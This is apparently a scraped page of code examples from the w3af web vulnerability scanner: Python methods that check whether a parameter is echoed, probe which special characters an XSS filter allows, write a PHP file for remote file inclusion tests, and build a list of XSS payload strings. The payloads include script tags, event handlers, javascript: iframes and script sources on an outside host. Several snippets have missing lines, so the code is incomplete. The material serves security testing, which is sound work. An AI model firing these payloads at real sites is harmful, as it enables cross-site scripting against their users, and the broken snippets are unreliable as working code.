Exemple #1
    def _is_echoed( self, mutant ):
        Verify if the parameter we are fuzzing is really being echoed back in the
        HTML response or not. If it isn't echoed there is no chance we are going to
        find a reflected XSS here.
        Also please note that I send a random alphanumeric value, and not a numeric
        value, because even if the number is echoed back (and only numbers are echoed
        back by the application) that won't be of any use in the XSS detection.
        @parameter mutant: The request to send.
        @return: True if variable is echoed
        # Create a random number and assign it to the mutant modified
        # parameter
        rndNum = str( createRandAlNum( 5 ) )
        oldValue = mutant.getModValue() 

        # send
        response = self._sendMutant( mutant, analyze=False )
        # restore the mutant values
        # Analyze and return response
        if rndNum in response:
            om.out.debug('The variable ' + mutant.getVar() + ' is being echoed back.' )
            return True

            om.out.debug('The variable ' + mutant.getVar() + ' is NOT being echoed back.' )
            return False
Exemple #2
 def _get_allowed_chars(self, mutant):
     These are the special characters that are tested:
         ['<', '>', '"', "'", '(', ')']
     I'm aware that this doesn't work if the filter also filters by length.
     The idea of this method is to reduce the amount of tests to be performed, if I start
     testing each char separately, I loose that performance enhancement that I want to
     @return: A list with the special characters that are allowed by the XSS filter
     # Create a random number and assign it to the mutant modified parameter
     rndNum = str( createRandAlNum( 4 ) )
     oldValue = mutant.getModValue() 
     joined_list = rndNum.join(self._special_characters)
     list_delimiter = str( createRandAlNum( 5 ) )
     joined_list = list_delimiter + joined_list + list_delimiter
     # send
     response = self._sendMutant( mutant, analyze=False )
     # restore the mutant values
     # Analyze the response
     allowed = []
     if response.getBody().count(list_delimiter) == 2:
         start = response.getBody().find(list_delimiter) 
         end = response.getBody().find(list_delimiter, start+1)
         the_list = response.getBody()[start+len(list_delimiter):end]
         split_list = the_list.split(rndNum)
         for i, char in enumerate(split_list):
             if char == self._special_characters[i]:
         raise w3afException('The delimiter was not echoed back!')
     if allowed == self._special_characters:
         om.out.debug('All special characters are allowed.')
     return allowed
 def _create_file(self):
     Create random name file php with random php content. To be used in the
     remote file inclusion test.
     # First, generate the php file to be included.
     rand1 = createRandAlNum(9)
     rand2 = createRandAlNum(9)
     filename = createRandAlNum()
     php_code = '<? \n echo "%s";\n echo "%s";\n ?>' % (rand1, rand2)
     # Write the php to the webroot
     file_handler = open(os.path.join(get_home_dir(), 'webroot', filename), 'w')
     # Define the required parameters
     netloc = self._listen_address +':' + str(self._listen_port)
     path = '/'+filename
     self._rfi_url = url_object.from_parts('http', netloc, path, None, None, None)
     self._rfi_result = rand1 + rand2
Exemple #4
    def _create_file(self):
        Create random name file php with random php content. To be used in the
        remote file inclusion test.
        # First, generate the php file to be included.
        rand1 = createRandAlNum(9)
        rand2 = createRandAlNum(9)
        filename = createRandAlNum()
        php_code = '<? \n echo "%s";\n echo "%s";\n ?>' % (rand1, rand2)

        # Write the php to the webroot
        file_handler = open(os.path.join(get_home_dir(), 'webroot', filename),

        # Define the required parameters
        netloc = self._listen_address + ':' + str(self._listen_port)
        path = '/' + filename
        self._rfi_url = url_object.from_parts('http', netloc, path, None, None,
        self._rfi_result = rand1 + rand2
Exemple #5
    def _get_xss_tests( self ):
        Does a select to the DB for a list of XSS strings that will be tested agains the site.
        @return: A list of tuples with all XSS strings to test and the browsers in which they work. 
        Example: [ ('<>RANDOMIZE', ['Internet Explorer']) ]
        xss_tests = []
        #   TODO: with these xss tests, and the rest of the plugin as it is, w3af has false negatives
        #    in the case in which we're already controlling something that is written inside <script></script>
        #    tags.
        # The number 2 is to inject in stored xss and not "letting the user know we are testing 
        # the site". And also please note that I don't have this: alert2('abc'); this "failure" will
        # let me find XSS in web applications that have magic_quotes enabled and will also 
        # "double" invalidate the JS code, because RANDOMIZE will be replaced by something
        # like ecd6c00b7 and that will be an undefined variables.
        # I use SCrIPT instead of script of SCRIPT, just because there are some programmers that
        # use blacklists that have those words, and they may be doing the comparison with a case
        # sensitive function (if 'script' in user_input...
        # if 'SCRIPT' in user_input)
        xss_tests.append(('<SCrIPT>alert("RANDOMIZE")</SCrIPT>', [browsers.ALL, ]))

        xss_tests.append(('<a href="blah" onmouseover=alert("RANDOMIZE")>blah</a>', [browsers.ALL, ]))
        # No quotes, with tag
        xss_tests.append(("<ScRIPT>a=/RANDOMIZE/\nalert(a.source)</SCRiPT>", [browsers.ALL, ]))
                [browsers.ALL, ]))
        xss_tests.append(("'';!--\"<RANDOMIZE>=&{()}", [browsers.ALL, ]))
        xss_tests.append(("<ScRIPt SrC=http://RANDOMIZE/x.js></ScRIPt>", [browsers.ALL, ]))
        xss_tests.append(("<ScRIPt/XSS SrC=http://RANDOMIZE/x.js></ScRIPt>", [browsers.ALL, ]))
                [browsers.INTERNET_EXPLORER_6, browsers.INTERNET_EXPLORER_7,
                browsers.NETSCAPE_IE, browsers.FIREFOX, browsers.NETSCAPE_G]))
        # http://secunia.com/advisories/9716/
        # ASP.NET bypass
                [browsers.INTERNET_EXPLORER_6, browsers.NETSCAPE_IE]))
        # This one only works in IE
                [browsers.INTERNET_EXPLORER_6, browsers.INTERNET_EXPLORER_7, browsers.NETSCAPE_IE]))
        xss_tests.append(("<IFRAME SRC=\"javascript:alert('RANDOMIZE');\"></IFRAME>", [browsers.ALL, ]))
        # IE only
                [browsers.INTERNET_EXPLORER_6, browsers.INTERNET_EXPLORER_7]))

        # Javascript
                [browsers.INTERNET_EXPLORER_6, browsers.NETSCAPE_IE, browsers.OPERA]))
                [browsers.INTERNET_EXPLORER_6, browsers.NETSCAPE_IE, browsers.OPERA]))
                [browsers.INTERNET_EXPLORER_6, browsers.NETSCAPE_IE, browsers.OPERA]))
                [browsers.INTERNET_EXPLORER_6, browsers.NETSCAPE_IE]))
        # I need to identify everything I send to the web app
        rnd_value = createRandAlNum(4)

        xss_tests = [ (x[0].replace( "RANDOMIZE", rnd_value ), x[1]) for x in xss_tests ]

        return xss_tests